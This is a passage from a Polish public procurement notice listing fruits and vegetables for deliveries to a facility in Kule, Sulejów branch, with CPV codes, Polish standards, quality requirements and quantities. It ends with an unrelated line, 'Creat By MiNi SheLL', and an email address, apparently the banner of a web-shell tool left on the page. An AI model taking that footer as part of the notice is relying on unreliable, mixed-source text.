PN-R-75535	Truskawki powinny być całe, nie mogą mieć żadnych ubytków lub uszkodzeń powstałych zarówno podczas wzrostu, zbioru i pakowania.Muszą być zdrowe, nie dopuszcza się owoców z objawami zepsucia lub z takimi zmianami, które czynią je niezdatnymi do spożycia. Muszą być wolne od jakichkolwiek oznak chorób lub zmian, które wpływają znacząco na ich wygląd oraz przydatność do spożycia, szczególnie  niedopuszczalne są ślady gnicia, nawet gdy są niewielkie. Truskawki muszą być czyste, wolne od zanieczyszczenia ziemią, kurzem, pozostałością środków ochrony roślin lub innych zanieczyszczeń, wolne od szkodników i uszkodzeń spowodowanych przez szkodniki. Kielich i szypułka powinny być świeże i zielone, a barwa i kształt powinny być charakterystyczne dla danej odmiany.	kg	100
40.	Nektarynki  
kl. I	03222332-9	Całe, zdrowe, nie dopuszcza się owoców z objawami gnicia lub zepsucia, które czynią je niezdatnymi do spożycia, czyste wolne od jakichkolwiek zanieczyszczeń obcych, szkodników, bez nadmiernego zawilgocenia powierzchniowego. Nektaryny powinny być dobrej jakości, powinny mieć cechy charakterystyczne dla danej odmiany. Miąższ musi być całkowicie zdrowy, nie dopuszcza się owoców pękniętych w miejscu przyrośnięcia szypułki.	kg	150
41.	Arbuzy kl. I	03222330-5
PN-R-75514	Całe, zdrowe, nie dopuszcza się owoców z objawami gnicia lub zepsucia, czyste, praktycznie wolne od szkodników, jędrne i dostatecznie dojrzałe, barwa i smak miąższu powinny być odpowiednie do danego stopnia dojrzałości, nie popękane, bez nadmiernego zawilgocenia pomierzch.	kg	200
42.	Gruszki kl. I	03222322-6
PN-R-75025	Gruszki muszą być nieuszkodzone, muszą być w dobrym stanie. Niedopuszczalny jest produkt zaczynający gnić lub psuć się w sposób wykluczający jego przydatność do spożycia, muszą być czyste, wolne od szkodników oraz uszkodzeń spowodowanych przez szkodniki, wolne od nieprawidłowej wilgoci zewnętrznej. Pod względem kształtu, rozmiaru i  wybarwienia muszą spełniać wymogi cechy odmianowej oraz mieć nienaruszone szypułki. Miąższ owoców musi być w idealnym stanie, a skórka wolna od chropowatych odrdzewionych miejsc, chyba, że ordzewienie stanowi cechę charakterystyczną danej odmiany.	kg	500
43.	Brzoskwinia
kl. I	03222332-9
PN-R-75526	Całe, zdrowe, nie dopuszcza się owoców z objawami gnicia lub zepsucia, czyste, wolne od jakichkolwiek widocznych zanieczyszczeń obcych, wolne od szkodników, bez nadmiernego zawilgocenia powierzchniowego. Brzoskwinie powinny być  dobrej jakości. Powinny mieć cechy charakterystyczne dla danej odmiany. Miąższ musi być całkowicie zdrowy	kg	100
44.	Czereśnie i wiśnie kl. I	03222333-6
PN-R-75028	Powinny być całe o świeżym wyglądzie, zdrowe, nie dopuszcza się owoców z objawami gnicia lub zepsucia, które czynią je niezdatnymi do spożycia, muszą być jędrne, czyste, wolne od jakichkolwiek zanieczyszczeń obcych. Powinny być dostatecznie rozwinięte i odpowiednio dojrzałe, powinny być dobrej jakości i mieć cechy charakterystyczne dla danej odmiany.	kg	100
45	Śliwki kl. I	03222334-3	Śliwki nie mogą mieć żadnych ubytków i uszkodzeń powstałych zarówno podczas wzrostu, zbioru i pakowania. Śliwki muszą być zdrowe, nie dopuszcza się owoców z objawami zepsucia lub z takimi zmianami, które czynią je niezdatnymi do spożycia. Śliwki powinny być całkowicie wolne od jakichkolwiek oznak chorób lub zmian , które znacząco wpływają na ich wygląd. Szczególnie niedopuszczalne są ślady gnicia, nawet, jeśli są niewielkie. Powinny być czyste i wolne od szkodników oraz nadmiernego zawilgocenia powierzchniowego.	kg	50.</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 03.22.12.00-8.</p></li>
<li><b>3) Czas trwania lub termin wykonania:</b> Okres w miesiącach: 12.</li><li><p><b>4) Kryteria oceny ofert: </b>najniższa cena. </ul><br>
<p><b>CZĘŚĆ Nr:</b> 2 <b>NAZWA:</b> Dostawy warzyw i owoców dla OSSW w Kulach Oddział Zamiejscowy w Sulejowie.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> L.p.	Nazwa artykułu	Kod CPV
Polska Norma	Opis przedmiotu zamówienia	J.m.	Ilość
1	Buraki czerwone
 kl. I	03221111-7
PN-72/R-75360	Świeże, minimalna średnica 5 cm, bez uszkodzeń powodujących obniżenie wartości użytkowej, czyste w workach siatkowych z tworzywa sztucz. do 10 kg.	kg	400
2	Cebula
kl. I	03221113-1 PN-87/R-75357	Świeża, minimalna średnica 4 cm, bez uszkodzeń powodujących obniżenie wartości użytkowej, czysta w workach siatkowych z tworzywa sztucz. do 15kg.	kg	600
3.	Czosnek
kl. I 	03221120-3
PN-R75518: 1996	Czosnek świeży, w główkach, bez uszkodzeń średnica 4 cm w woreczkach siatkowych do 1 kg.	Szt.	400
4.	Kapusta biała głowiasta
kl. I	03221410-3
PN-87/R-75362
	Kapusta biała w główkach prawidłowo związanych, świeża, bez uszkodzeń mechanicznych powodujących obniżenie wartości użytkowej, wielkość, kształt i barwa główki charakterystyczna dla danego rodzaju i odmiany, wolne od szkodników i ich pozostałości, czysta , bez zewnętrznych liści, w workach siatkowych z tworzywa sztucz. do 25 kg	kg	600
5.	Kapusta czerwona głowiasta
kl. I	03221410-3
PN-87/R-75362	Kapusta czerwona w główkach, prawidłowo związanych, czystych bez uszkodzeń mechanicznych, wielkość, kształt i barwa główki charakterystyczna dla danego rodzaju i odmiany, wolne od szkodników i ich pozostałości, w workach siatkowych z tworzywa sztucz. do 10 kg.	kg	600
6.	Kapusta pekińska
kl. I	03221410-3
PN-87/R-7536	Świeża, czysta, bez uszkodzeń, foliowana, w workach foliowych do 5 kg.	kg	400
7.	Koperek natka
kl. I	03221300-9
PN-R/75384:
1997	Młody, świeży, czysty, bez zanieczyszczeń, wolny od szkodników i ich pozostałości w pęczkach o wadze ok.20 g	pęczek	1000
8.	Marchew korzeń
kl. I 	03221112-4
PN-84/R-75358	Świeża, minim. średnica 2 cm, minimalna długość 12 cm, bez uszkodzeń powodujących obniżenie wartości użytkowej, czysta w workach siatkowych z tworzywa sztucznego do 10 kg	kg	1000
9.	Ogórek zielony
kl. I	03221270-9
PN-R-75358	Owoce całe, świeże, zdrowe, czyste bez uszkodzeń mechanicznych, prawidłowo wybarwione, wielkość, kształt i barwa owocu charakterystyczna dla danego rodzaju i odmiany, wolne od szkodników i ich pozostałości. Opakowania do 5 kg.	kg	600
10.	Papryka 
kl. I	03221230-7
BN 85 9137-36	Owoce papryki czerwonej, żółtej lub zielonej, czysta, jędrna, bez uszkodzeń mechanicznych, prawidłowo wybarwiona, wielkość, kształt i barwa owocu charakterystyczna dla danego rodzaju i odmiany, wolne od szkodników i ich pozostałości. Opakowanie do 5 kg	kg	150
11.	Pietruszka korzeń
kl. I	03221110-0
PN-R-75370:1996	Świeża, minim.śr.2 cm, minim. na długość 12 cm, bez uszkodzeń powodujących obniżenie wartości użytkowej, czysta, w workach siatk. z tworz. sztucznego do 5 kg.	kg	300
12.	Pietruszka natka
kl. I	03221300-9
PN-R-75384	Młoda, czysta, świeża, zielona, bez zanieczyszczeń, wolna od szkodników i ich pozostałości w pęczkach o wadze 20 g	pęczek	1000
13.	Pomidory
kl. I	03221240-4
PN-R-75368	Owoce całe, świeże, jędrne, zdrowe, czyste bez uszkodzeń mechanicznych, wielkość wyrównana odmianowo, barwy i kształtu charakterystycznego dla danej odmiany. Na przekroju maksymalnie mięsisty, prawidłowo wybarwiony, bez pustych komór, bez zielonej piętki, skorkowacenia, nadmiernego zawilgocenia, szkodników i ich pozostałości. Nie dopuszcza się plam chorobotwórczych i zaparzenia. Opakowanie do 6 kg. kl. I	kg	700
14.	Por zielony
kl. I	03221110-0
PN-R-75521:1996	Świeży, nie obcinany, bez uszkodzeń powodujących obniżenie wartości użytkowej, czysty, w workach siatkowych z tworzywa sztucznego do 5 kg.	kg	500
15.	Rzodkiewka
kl. I	03221110-0
PN-72-9137-22	Owoc rzodkiewki cały, świeży, zdrowy, czysty bez uszkodzeń powodujących obniżenie wartości użytkowej, czysty, wolny od szkodników i ich pozostałości nie obcinany w pęczkach po 10 szt.	pęczek	100
16.	Sałata zielona 
kl. I	03221310-2
PN-R-75360	Świeża, zdrowa, czysta, o soczystych, mięsistych zielonych liściach bez uszkodzeń powodujących obniżenie wartości użytkowej, wolna od Szkodników i ich pozostałości, minimalna waga główki sałaty 200g.	Szt.	1500
17.	Seler korzeń
kl. I	03221110-0
PN-R-75371:1996	Minimalna średnica 5cm,świeży,bez uszkodzeń powodujących obniżenie wartości użytkowej, czysty w workach siatkowych z tworzywa sztucznego do 5 kg 	kg	600
18.	Fasolka szparagowa
kl. I	03221212-5
PN-77/R-75762	Strąki fasolki szparagowej zielone lub żółte. Fasolka cała ,świeża, zdrowa, bez uszkodzeń powodujących obniżenie wartości użytkowej, wolna od szkodników i ich pozostałości, czysta w workach siatkowych z tworzywa sztucznego do 5 kg.	kg	150
19.	Szczypiorek natka
kl. I	03221300-9
PN-R-75391	Młody, czysty, świeży, zielone cienkie pędy, bez zanieczyszczeń, wolny od szkodników i zanieczyszczeń w pęczkach o wadze do 20 g.	pęczek	1000
20.	Pieczarki
kl. I	03221260-6	Świeże, duże, zdrowe, w kl. I bez uszkodzeń powodujących obniżenie wartości użytkowej, czyste, w skrzyneczkach plastikowych do 5 kg	kg	200
21	Cukinia
kl. I	03221250-3	Owoc cukini zbliżony kształtem do ogórków, zdrowy, młody o długości 10-20 cm o delikatnej skórce.	kg	100
22	Kalafior
kl. I	03221420-6
PN-72-R-75361	Kalafior w główkach, świeży, duży, bez uszkodzeń mechanicznych powodujących obniżenie wartości użytkowej, czysty wolny od szkodników i ich pozostałości, wielkość, kształt i barwa główki charakterystyczna dla danego rodzaju i odmiany, bez zewnętrznych liści .	Szt.	100
23	Ziemniaki jadalne
kl. I	03212100-1
PN-75/R-74450	Ziemniaki jadalne, zebrane po osiągnięciu pełnej dojrzałości o skórce skorkowaciałej, średnica ziemniaka minimum 5 cm, o świeżym wyglądzie, właściwym kształcie, zapachu, bez zanieczyszczeń, w jednej z następujących odmian: Orlik, Irga, Bryza, Anatol, w workach polietylenowych siatkowych, zamkniętych węzłem lub zawiązanych sznurkiem do 30 kg	kg	10000
24	Botwinka	03221300-9	Buraki czerwone z liśćmi i łodygami. Czyste, świeże, zdrowe bez zanieczyszczeń i uszkodzeń powodujących obniżenie wartości użytkowej, wolne od szkodników ,pakowany w pęczki po 10 szt 	pęczek	200
25	Banany
kl. I	03222111-4
PN-R-75514	Całe, zdrowe, nie dopuszcza się owoców z objawami gnicia lub zepsucia, czyste, wolne od jakichkolwiek zanieczyszczeń obcych, szkodników i ich pozostałości.	kg	400
26	Cytryny
kl. I	03222210-8
PN-ISO3631:
1999	Całe, wolne od odgnieceń, zdrowe, nie dopuszcza się owoców z objawami gnicia lub zepsucia, czyste, praktycznie wolne od jakichkolwiek zanieczyszczeń obcych, wolne od szkodników i ich pozostałości oraz nadmiernego zawilgocenia powierzchniowego. Barwa powinna być właściwa dla danej odmiany	kg	300
27	Jabłka deserowe
kl. I	03222321-9
PN-R-75521	Jabłka świeże, przeznaczone do obrotu i spożycia, średnica pow. 80 mm. Owoce jednolite odmianowo i wielkością w partii, dojrzałe, bez zmian chorobowych, zdrowe, jędrne, czyste, nie uszkodzone mechaniczne, z szypułką, bez uszkodzeń skórki i miąższu, czyste	kg	400
28	Jabłka świeże
kl. II	03222321-9
PN-R-75521	Jabłka świeże, przeznaczone do obrotu i spożycia, średnica min. 60 mm. Owoce jednolite odmianowo i wielkością w partii, dojrzałe, bez zmian chorobowych, zdrowe, jędrne, czyste, nie uszkodzone mechaniczne, z szypułką, bez uszkodzeń skórki i miąższu, czyste	kg	600
29	Mandarynki
kl. I	03222240-7
PN-R-75514	Całe, wolne od odgnieceń, zdrowe, nie dopuszcza się owoców z objawami gnicia lub zepsucia, czyste, wolne od jakichkolwiek zanieczyszczeń obcych, wolne od szkodników i ich pozostałości oraz nadmiernego zawilgocenia powierzchniowego. Barwa powinna być właściwa dla danej odmiany na przynajmniej jednej trzeciej powierzchni.	kg	50
30	Pomarańcze
kl. I	03222220-1
PN-84/R-75024	Całe, wolne od odgnieceń, zdrowe, nie dopuszcza się owoców z objawami gnicia lub zepsucia, czyste, wolne od jakichkolwiek zanieczyszczeń obcych, wolne od szkodników i ich pozostałości oraz nadmiernego zawilgocenia powierzchniowego. Barwa powinna być typowa dla danej odmiany.	kg	50
31	Winogrona
kl. I	03222340-8
PN-R-75519	Kiście i jagody winogron powinny być: zdrowe, nie dopuszcza się owoców z objawami zepsucia, czyste, praktycznie wolne od jakichkolwiek widocznych zanieczyszczeń obcych, wolne od szkodników, wolne od uszkodzeń spowodowanych przez szkodniki, wolne od nadmiernego zawilgocenia powierzchniowego. Jagody winogron powinny być całe, dobrze rozwinięte, prawidłowo wykształcone. Powinny mieć kształt, stopień rozwoju i barwę charakterystyczne dla danej odmiany.	kg	50
32	Truskawki
kl. I	03222313-0
PN-R-75535	Truskawki powinny być całe, nie mogą mieć żadnych ubytków lub uszkodzeń powstałych zarówno podczas wzrostu, zbioru i pakowania. Muszą być zdrowe, nie dopuszcza się owoców z objawami zepsucia lub z takimi zmianami, które czynią je niezdatnymi do spożycia. Muszą być wolne od jakichkolwiek oznak chorób lub zmian, które wpływają znacząco na ich wygląd oraz przydatność do spożycia, szczególnie niedopuszczalne są ślady gnicia, nawet gdy są niewielkie. Truskawki muszą być czyste, wolne od zanieczyszczenia ziemią, kurzem, pozostałością środków ochrony roślin lub innych zanieczyszczeń, wolne od szkodników i uszkodzeń spowodowanych przez szkodniki. Kielich i szypułka powinny być świeże i zielone, a barwa i kształt powinny być charakterystyczne dla danej odmiany.	kg	100
33	Nektarynki
kl. I	03222332-9	Całe, zdrowe, nie dopuszcza się owoców z objawami gnicia lub zepsucia, które czynią je niezdatnymi do spożycia, czyste wolne od jakichkolwiek zanieczyszczeń obcych, szkodników, bez nadmiernego zawilgocenia powierzchniowego. Nektaryny powinny być dobrej jakości, powinny mieć cechy charakterystyczne dla danej odmiany. Miąższ musi być całkowicie zdrowy, nie dopuszcza się owoców pękniętych w miejscu przyrośnięcia szypułki.	kg	150
34	Gruszki
kl. I	03222322-6
PN-R-75025	Gruszki muszą być nieuszkodzone, muszą być w dobrym stanie. Niedopuszczalny jest produkt zaczynający gnić lub psuć się w sposób wykluczający jego przydatność do spożycia, muszą być czyste, wolne od szkodników oraz uszkodzeń spowodowanych przez szkodniki, wolne od nieprawidłowej wilgoci zewnętrznej. Pod względem kształtu, rozmiaru i wybarwienia muszą spełniać wymogi cechy odmianowej oraz mieć nienaruszone szypułki. Miąższ owoców musi być w idealnym stanie, a skórka wolna od chropowatych odrdzewionych miejsc, chyba, że ordzewienie stanowi cechę charakterystyczną danej odmiany.	kg	50
35	Brzoskwinia
kl. I	03222332-9
PN-R-75526	Całe, zdrowe, nie dopuszcza się owoców z objawami gnicia lub zepsucia, czyste, wolne od jakichkolwiek widocznych zanieczyszczeń obcych, wolne od szkodników, bez nadmiernego zawilgocenia powierzchniowego. Brzoskwinie powinny być dobrej jakości. Powinny mieć cechy charakterystyczne dla danej odmiany. Miąższ musi być całkowicie zdrowy	kg	150
36	Wiśnie
kl. I	03222333-6
PN-R-75028	Powinny być całe o świeżym wyglądzie, zdrowe, nie dopuszcza się owoców z objawami gnicia lub zepsucia, które czynią je niezdatnymi do spożycia, muszą być jędrne, czyste, wolne od jakichkolwiek zanieczyszczeń obcych. Powinny być dostatecznie rozwinięte i odpowiednio dojrzałe, powinny być dobrej jakości i mieć cechy charakterystyczne dla danej odmiany.	kg	200
37	Czereśnie
kl. I	03222333-6
PN-R-75028	Powinny być całe o świeżym wyglądzie, zdrowe, nie dopuszcza się owoców z objawami gnicia lub zepsucia, które czynią je niezdatnymi do spożycia, muszą być jędrne, czyste, wolne od jakichkolwiek zanieczyszczeń obcych. Powinny być dostatecznie rozwinięte i odpowiednio dojrzałe, powinny być dobrej jakości i mieć cechy charakterystyczne dla danej odmiany.	kg	200
38	Śliwki
kl. I	03222334-3	Śliwki nie mogą mieć żadnych ubytków i uszkodzeń powstałych zarówno podczas wzrostu, zbioru i pakowania. Śliwki muszą być zdrowe, nie dopuszcza się owoców z objawami zepsucia lub z takimi zmianami, które czynią je niezdatnymi do spożycia. Śliwki powinny być całkowicie wolne od jakichkolwiek oznak chorób lub zmian , które znacząco wpływają na ich wygląd. Szczególnie niedopuszczalne są ślady gnicia, nawet, jeśli są niewielkie. Powinny być czyste i wolne od szkodników oraz nadmiernego zawilgocenia powierzchniowego.	kg	300.</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 03.22.12.00-8.</p></li>
<li><b>3) Czas trwania lub termin wykonania:</b> Okres w miesiącach: 12.</li><li><p><b>4) Kryteria oceny ofert: </b>najniższa cena. </ul><br>

Creat By MiNi SheLL
Email: jattceo@gmail.com